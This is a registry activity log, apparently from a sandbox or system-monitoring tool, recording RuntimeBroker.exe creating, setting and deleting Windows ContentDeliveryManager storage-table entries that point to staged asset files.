Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\89e00412-11f9-4268- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000ec64a456698ddb01ec64a456698ddb01ec64a456698ddb01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000655afa062000663432366137663230326330626566343336363036623138313963316339363536633764663065623565356231636566366166393132663038396330386632390000b20009000400efbe655afa06655afa062e0000000000000000000000000000000000000000000000000014b70e01660034003200360061003700660032003000320063003000620065006600340033003600360030003600620031003800310039006300310063003900360035003600630037006400660030006500620035006500350062003100630065006600360061006600390031003200660030003800390063003000380066003200390000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000374c46771000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c66343236613766323032633062656634333636303662313831396331633936353663376466306562356535623163656636616639313266303839633038663239000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000676f69676e77656a0000000000000000c85995649be9304fa5992dfa6fd26d66ea83aaef44edef11ad466a30fd81d1a6c85995649be9304fa5992dfa6fd26d66ea83aaef44edef11ad466a30fd81d1a6ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100370030003600300034003200330039002d003800350030003800360030003700350037002d0033003100310032003000300035003700310035002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c9f51e24000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\99d2a197-4a08-48d8-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\99d2a197-4a08-48d8-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8e9975d-01b6-4949- = "8324"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7df04202-a482-4619-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\21f05d18-b523-410a- = 1cff9a56698ddb01	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d15e0305-a26a-4ee4- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000003cefad56698ddb013cefad56698ddb013cefad56698ddb01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000655afa062000333839393162643361346530393665646466326461343164363435623964666163316439363965653835643962653939303434386236643630393136646664320000b20009000400efbe655afa06655afa062e00000000000000000000000000000000000000000000000000c42c0501330038003900390031006200640033006100340065003000390036006500640064006600320064006100340031006400360034003500620039006400660061006300310064003900360039006500650038003500640039006200650039003900300034003400380062003600640036003000390031003600640066006400320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000374c46771000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33383939316264336134653039366564646632646134316436343562396466616331643936396565383564396265393930343438623664363039313664666432000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000676f69676e77656a0000000000000000c85995649be9304fa5992dfa6fd26d66eb83aaef44edef11ad466a30fd81d1a6c85995649be9304fa5992dfa6fd26d66eb83aaef44edef11ad466a30fd81d1a6ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100370030003600300034003200330039002d003800350030003800360030003700350037002d0033003100310032003000300035003700310035002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c9f51e24000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc51e063-945d-40be-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc51e063-945d-40be-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\99d2a197-4a08-48d8- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\99d2a197-4a08-48d8- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000ccc40357698ddb01ba967857698ddb01ba967857698ddb011c290a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000655afa062000306662353330666262343261336533336665383838363063646237313436366138333539613832613332313061323731326335623966623865626530613631620000b20009000400efbe655afa06655afa062e0000000000000000000000000000000000000000000000000092661f01300066006200350033003000660062006200340032006100330065003300330066006500380038003800360030006300640062003700310034003600360061003800330035003900610038003200610033003200310030006100320037003100320063003500620039006600620038006500620065003000610036003100620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000374c46771000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c30666235333066626234326133653333666538383836306364623731343636613833353961383261333231306132373132633562396662386562653061363162000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000676f69676e77656a0000000000000000c85995649be9304fa5992dfa6fd26d66ef83aaef44edef11ad466a30fd81d1a6c85995649be9304fa5992dfa6fd26d66ef83aaef44edef11ad466a30fd81d1a6ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100370030003600300034003200330039002d003800350030003800360030003700350037002d0033003100310032003000300035003700310035002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c9f51e24000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8ee8df12-3c32-46df- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000078270657698ddb015dd19257698ddb015dd19257698ddb0138fb09000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000655afa062000333839393162643361346530393665646466326461343164363435623964666163316439363965653835643962653939303434386236643630393136646664320000b20009000400efbe655afa06655afa062e00000000000000000000000000000000000000000000000000c42c0501330038003900390031006200640033006100340065003000390036006500640064006600320064006100340031006400360034003500620039006400660061006300310064003900360039006500650038003500640039006200650039003900300034003400380062003600640036003000390031003600640066006400320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000374c46771000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33383939316264336134653039366564646632646134316436343562396466616331643936396565383564396265393930343438623664363039313664666432000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000676f69676e77656a0000000000000000c85995649be9304fa5992dfa6fd26d66f283aaef44edef11ad466a30fd81d1a6c85995649be9304fa5992dfa6fd26d66f283aaef44edef11ad466a30fd81d1a6ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100370030003600300034003200330039002d003800350030003800360030003700350037002d0033003100310032003000300035003700310035002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c9f51e24000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\37bc8043-8c5f-49be-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b8bcfb66-e4f8-4ead-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc51e063-945d-40be- = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\37bc8043-8c5f-49be- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\89e00412-11f9-4268- = 5221ae56698ddb01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7df04202-a482-4619-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc51e063-945d-40be- = 78a58c57698ddb01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7e8d2f7e-81a9-4eb4- = "\\\\?\\Volume{241EF5C9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\d80b6d68d740ac2196577a2707c7993dab7ee89af97616ea3ed277206f3c72d0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8e9975d-01b6-4949- = f5c91658698ddb01	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\37bc8043-8c5f-49be- = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\21f05d18-b523-410a- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000006eb59356698ddb016eb59356698ddb016eb59356698ddb01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000655afa062000306662353330666262343261336533336665383838363063646237313436366138333539613832613332313061323731326335623966623865626530613631620000b20009000400efbe655afa06655afa062e0000000000000000000000000000000000000000000000000092661f01300066006200350033003000660062006200340032006100330065003300330066006500380038003800360030006300640062003700310034003600360061003800330035003900610038003200610033003200310030006100320037003100320063003500620039006600620038006500620065003000610036003100620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000374c46771000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c30666235333066626234326133653333666538383836306364623731343636613833353961383261333231306132373132633562396662386562653061363162000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000676f69676e77656a0000000000000000c85995649be9304fa5992dfa6fd26d66e883aaef44edef11ad466a30fd81d1a6c85995649be9304fa5992dfa6fd26d66e883aaef44edef11ad466a30fd81d1a6ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100370030003600300034003200330039002d003800350030003800360030003700350037002d0033003100310032003000300035003700310035002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c9f51e24000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7df04202-a482-4619-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc51e063-945d-40be- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000fa26e756698ddb01d3bf6057698ddb01d3bf6057698ddb01727a07000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000655afa062000663432366137663230326330626566343336363036623138313963316339363536633764663065623565356231636566366166393132663038396330386632390000b20009000400efbe655afa06655afa062e0000000000000000000000000000000000000000000000000014b70e01660034003200360061003700660032003000320063003000620065006600340033003600360030003600620031003800310039006300310063003900360035003600630037006400660030006500620035006500350062003100630065006600360061006600390031003200660030003800390063003000380066003200390000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000374c46771000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c66343236613766323032633062656634333636303662313831396331633936353663376466306562356535623163656636616639313266303839633038663239000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000676f69676e77656a0000000000000000c85995649be9304fa5992dfa6fd26d66ee83aaef44edef11ad466a30fd81d1a6c85995649be9304fa5992dfa6fd26d66ee83aaef44edef11ad466a30fd81d1a6ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100370030003600300034003200330039002d003800350030003800360030003700350037002d0033003100310032003000300035003700310035002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c9f51e24000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\85372c46-68d3-4a63-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\21f05d18-b523-410a- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b8bcfb66-e4f8-4ead-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\85372c46-68d3-4a63- = "\\\\?\\Volume{241EF5C9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\636b91fb65fdca48a4a15dd8d5a349f9713528650ed6644fe848539be34d6da6"	RuntimeBroker.exe
